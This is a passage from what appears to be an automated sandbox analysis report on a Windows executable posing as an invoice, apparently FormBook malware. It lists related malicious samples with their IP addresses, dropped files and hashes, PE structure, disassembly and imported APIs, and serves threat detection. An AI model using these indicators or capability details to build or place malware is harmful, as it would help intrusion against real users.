                                                            rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
                                                            Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
                                                            SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
                                                            fp2e7a.wpc.phicdn.netPayment Advice D 0024679526 3930.exeGet hashmaliciousFormBookBrowse
                                                            • 192.229.221.95
                                                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                            • 192.229.221.95
                                                            05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 192.229.221.95
                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 192.229.221.95
                                                            somes.exeGet hashmaliciousRedLineBrowse
                                                            • 192.229.221.95
                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                            • 192.229.221.95
                                                            asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 192.229.221.95
                                                            2Wr5r2e9vo.msiGet hashmaliciousUnknownBrowse
                                                            • 192.229.221.95
                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                            • 192.229.221.95
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 192.229.221.95

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKPayroll List.exeGet hashmaliciousFormBookBrowse
                                                            • 154.216.76.80
                                                            Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                            • 154.215.72.110
                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                            • 154.215.72.110
                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                            • 154.215.72.110
                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                            • 156.251.17.224
                                                            Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                            • 154.215.72.110
                                                            https://trackru.top/usGet hashmaliciousUnknownBrowse
                                                            • 156.244.41.195
                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                            • 154.215.72.110
                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                            • 154.215.72.110
                                                            MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
                                                            AMAZONEXPANSIONGBhttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                            • 3.33.220.150
                                                            https://clever-photos-686127.framer.app/Get hashmaliciousUnknownBrowse
                                                            • 52.223.52.2
                                                            santi.exeGet hashmaliciousFormBookBrowse
                                                            • 3.33.130.190
                                                            TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • 3.33.130.190
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 3.33.130.190
                                                            setup (1).msiGet hashmaliciousAteraAgentBrowse
                                                            • 52.223.39.232
                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            • 3.33.130.190
                                                            http://www.tqltrax.comGet hashmaliciousUnknownBrowse
                                                            • 3.33.148.61
                                                            https://rebrand.ly/gs02u8aGet hashmaliciousUnknownBrowse
                                                            • 3.33.143.57
                                                            https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                            • 3.33.220.150
                                                            VNPT-AS-VNVNPTCorpVNapep.sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 14.187.251.91
                                                            apep.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 14.236.143.147
                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                            • 202.92.5.23
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 14.249.184.119
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 123.28.58.156
                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 14.188.157.232
                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 113.164.17.185
                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 14.249.184.121

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\283026M3L

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\ktmutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1239949490932863
                                                            Encrypted:false
                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                            MD5:271D5F995996735B01672CF227C81C17
                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\anaboly

                                                            Download File
                                                            Process:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288256
                                                            Entropy (8bit):7.995573050499963
                                                            Encrypted:true
                                                            SSDEEP:6144:1mjiaWTQWACLg5NWwqrN4teDuFioF3eq5pfT9s4dLpKVk1j:1HaWTpACLg5jqrNmgeiERXTFC21j
                                                            MD5:2FAEC24389EF9C0D9EB5AF58806D7569
                                                            SHA1:084CEA800148C5B86176A7F973C05B9A4502F6CA
                                                            SHA-256:DCB28B09D87A83713E25EE8A7BAA7E193F760AF6C10D212E760815A486B728D9
                                                            SHA-512:5788E5AB9C22FAB9BC0743FD58662E8891E05927B4D42A7EE3C4954BAFA84A7B69EE22898E6F90BCDB5A123B959CB349F37F6860196A9CC46012F17D8F3517D5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.k...AXIQ..0...w.WY...BP...LM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW.1TG8^.GQ.E...S..j.?3Bt7D.?;0=l.X#<,6k02zC!).(6i...mT"6&lF_]~1TG6AXI(QE..-5..+5.gQ3.,..k0+.#...~+5.@....!?..9/%.-5.BKRWZ1TGf.XI.QMM.."BKRWZ1TG.AZHZQGM9.VCBKRWZ1TG.UXIQ@LM9=VCBK.WZ!TG6CXIWPLM9MRCDKRWZ1TG61\IQRLM9MRC@K..Z1DG6QXIQP\M9]RCBKRWJ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM.97;6KRW.cPG6QXIQ.HM9]RCBKRWZ1TG6AXIqPL-9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW

                                                            C:\Users\user\AppData\Local\Temp\aut6F38.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288256
                                                            Entropy (8bit):7.995573050499963
                                                            Encrypted:true
                                                            SSDEEP:6144:1mjiaWTQWACLg5NWwqrN4teDuFioF3eq5pfT9s4dLpKVk1j:1HaWTpACLg5jqrNmgeiERXTFC21j
                                                            MD5:2FAEC24389EF9C0D9EB5AF58806D7569
                                                            SHA1:084CEA800148C5B86176A7F973C05B9A4502F6CA
                                                            SHA-256:DCB28B09D87A83713E25EE8A7BAA7E193F760AF6C10D212E760815A486B728D9
                                                            SHA-512:5788E5AB9C22FAB9BC0743FD58662E8891E05927B4D42A7EE3C4954BAFA84A7B69EE22898E6F90BCDB5A123B959CB349F37F6860196A9CC46012F17D8F3517D5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.k...AXIQ..0...w.WY...BP...LM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW.1TG8^.GQ.E...S..j.?3Bt7D.?;0=l.X#<,6k02zC!).(6i...mT"6&lF_]~1TG6AXI(QE..-5..+5.gQ3.,..k0+.#...~+5.@....!?..9/%.-5.BKRWZ1TGf.XI.QMM.."BKRWZ1TG.AZHZQGM9.VCBKRWZ1TG.UXIQ@LM9=VCBK.WZ!TG6CXIWPLM9MRCDKRWZ1TG61\IQRLM9MRC@K..Z1DG6QXIQP\M9]RCBKRWJ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM.97;6KRW.cPG6QXIQ.HM9]RCBKRWZ1TG6AXIqPL-9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.145927637087262
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:ORIGINAL INVOICE COAU7230734290.exe
                                                            File size:1'212'928 bytes
                                                            MD5:faf30d977546a3527433829420a666c5
                                                            SHA1:5258f4d7a4422007f249a28b67320d6b9e3d978d
                                                            SHA256:2d9b62300c1248c233aa02fa4daa6d77efed6b8c617a8b33f4e9b71590941cda
                                                            SHA512:654b593d4eb99443e9292ccf2de23b9212fff72a77d5c42f8b61589b8607758165c4587889fda4e240fa3cba8cd704dd9e1f32f1f2421434dba3a29842ba4416
                                                            SSDEEP:24576:ptb20pkaCqT5TBWgNQ7ayAEEqRrcQkJmO6A:6Vg5tQ7ayAZz5
                                                            TLSH:7645DF1363DE8361C3B25273BA25B751AEBF782506B1F56B2FD4093DE920122521EB73
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                            File Icon

                                                            Icon Hash:aaf3e3e3938382a0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x425f74
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x673E826D [Thu Nov 21 00:44:29 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007FDEE4D962CFh
                                                            jmp 00007FDEE4D892E4h
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007FDEE4D8946Ah
                                                            cmp edi, eax
                                                            jc 00007FDEE4D897CEh
                                                            bt dword ptr [004C0158h], 01h
                                                            jnc 00007FDEE4D89469h
                                                            rep movsb
                                                            jmp 00007FDEE4D8977Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007FDEE4D89634h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007FDEE4D89470h
                                                            bt dword ptr [004BA370h], 01h
                                                            jc 00007FDEE4D89940h
                                                            bt dword ptr [004C0158h], 00000000h
                                                            jnc 00007FDEE4D8960Dh
                                                            test edi, 00000003h
                                                            jne 00007FDEE4D8961Eh
                                                            test esi, 00000003h
                                                            jne 00007FDEE4D895FDh
                                                            bt edi, 02h
                                                            jnc 00007FDEE4D8946Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007FDEE4D89473h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007FDEE4D894C5h
                                                            bt esi, 03h
                                                            jnc 00007FDEE4D89518h
                                                            movdqa xmm1, dqword ptr [esi+00h]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2012 UPD4 build 61030
                                                            • [RES] VS2012 UPD4 build 61030
                                                            • [LNK] VS2012 UPD4 build 61030

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f05c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc40000x5f05c0x5f200ee4e70406a89afdc882777b73dc9bf38False0.9305883500328516data7.901175237921238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xcc7b80x56361data1.0003284992962753
                                                            RT_GROUP_ICON0x122b1c0x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x122b940x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x122ba80x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x122bbc0x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x122bd00xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x122cac0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                            Imports

                                                            DLLImport
                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
